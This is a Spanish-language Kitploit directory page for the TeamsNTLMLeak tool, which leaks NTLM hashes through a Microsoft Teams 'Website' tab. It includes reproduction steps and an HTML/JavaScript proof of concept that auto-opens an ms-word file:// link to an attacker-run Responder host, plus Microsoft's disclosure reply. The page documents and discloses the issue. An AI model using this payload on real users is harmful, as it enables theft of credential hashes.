Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
TeamsNTLMLeak — Exfiltrar NTLM mediante la pestaña Sitio web en Teams a través de MS Office | Kitploit
Herramientas/GitHubGitHub/soufianetahiri/teamsntlmleak
Ataques de ContraseñasExplotaciónRecopilación de InformaciónPhishingIngeniería SocialRed TeamingAtaque Adversario
GitHubsoufianetahiri/teamsntlmleak

TeamsNTLMLeak

Exfiltrar NTLM mediante la pestaña Sitio web en Teams a través de MS Office

Ver Repositorio
809hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descripción

Cuando un usuario navega a una pestaña "Website" que dirige a una página web especialmente diseñada, puede resultar en la exposición del hash NTLM mediante la activación de un esquema de URL de Office, reduciendo así el proceso a una ruta de un solo clic para la fuga.

Si se intenta abrir un enlace con el formato ms-word:ofv|u|file://Share/File.docx desde un navegador, se requieren los siguientes pasos:

1- El usuario debe confirmar su intención de abrir Word.

2- El usuario debe reconocer y aceptar los riesgos indicados en el mensaje de advertencia de MS Office.

Sin embargo, en la pestaña Website, la acción del usuario se simplifica a solo aceptar el riesgo.

Pasos de reproducción

  1. Ejecuta Responder en una máquina del "atacante"
  2. Sirve una página HTML que contenga el siguiente código:
root@kitploit:~
<html>
<head>
    <title>Auto Open Document</title>
</head>
<body>
    <a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
    <script>
        window.onload = function() {
            document.getElementById('autoOpenLink').click();
        };
    </script>
</body>
</html>

3. En Teams, configura una pestaña "Website" que dirija a la página web que acabas de crear. 4. Accede a la "pestaña".

Cuando visitas la pestaña, un enlace activado por JavaScript inicia automáticamente la apertura de Word. Si el usuario acepta el aviso en Word haciendo clic en "Sí", su hash NTLM se transmite a la máquina del "atacante".

Demo

PoC

Divulgación

El mié., 27 de marzo de 2024, 20:23, Microsoft Security Response Center <[email protected]mailto:[[email protected]](mailto:[email protected])> escribió:
Hola,
Gracias por tu envío. Determinamos que tu hallazgo es válido, pero no cumple con nuestro criterio para un servicio inmediato porque la gravedad del problema es baja. Nuestros ingenieros indicaron que un usuario aún tendría que dar su consentimiento en Word u otros clientes de Office antes de que se filtre el NTLM, lo que reduce la gravedad. Sin embargo, hemos marcado tu hallazgo para una revisión futura como una oportunidad para mejorar nuestros productos y como un problema de funcionalidad a mejorar. No tengo un plazo para esta revisión. Como no se requiere ninguna acción adicional en este momento, cierro este caso.
Atentamente,
MSRC

Parece corregido en la versión 24033.813.2773.520. de Microsoft Teams.

Descargar herramienta